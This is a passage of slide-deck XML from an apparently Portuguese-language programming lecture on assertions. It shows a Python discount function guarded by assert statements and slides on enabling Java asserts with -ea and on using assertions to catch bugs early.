            <a:off x="8205075" y="2029125"/>
            <a:ext cx="7149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t>1988</a:t>
            </a:r>
            <a:endParaRPr sz="13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3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Exemplo 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="310000" y="1381075"/>
            <a:ext cx="8736300" cy="17580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en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> calculate_discount(price, discount_percentage):</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> price &gt;= 0, "Price must be non-negative"</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 0 &lt;= discount_percentage &lt;= 100, "Discount must be between 0 and 100"</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> price * (1 - discount_percentage / 100)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>calculate_discount(-100, 50)  # Triggers an assertion error</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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Comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>"assert" em Java</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>"assert" é um comando nativo de Java</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Sua execução está desabilitada por default em run-time</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Para habilitar a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>execução</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> de asserts, deve-se executar a JVM com o flag "-ea" (ea = enable assertions)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Python: funcionamento muito parecido</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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Observações</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>"assert" deve ser habilitado apenas na fase de testes e depuração de um sistema</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Esta é uma das diferenças fundamentais entre assert e exceções </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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3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Observações</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Google Shape;208;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Quando um assert falha, ativa-se uma exceção</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Mas este </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>é um tipo especial de exceção que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>ão deve ser tratado (em um catch), pois a falha de um assert representa um erro de lógica, isto é, um bug</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;209;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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4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Objetivo de um assert</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Ajudar desenvolvedores a detectar bugs mais cedo</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Ou seja, assim que uma condição anormal for detectada</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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17" name="Google Shape;217;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="995800" y="2371675"/>
            <a:ext cx="6108900" cy="17580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en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> calculate_discount(price, discount_percentage):</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> price &gt;= 0</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 0 &lt;= discount_percentage &lt;= 100</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> price * (1 - discount_percentage / 100)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>calculate_discount(-100, 50)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p40"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="219" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
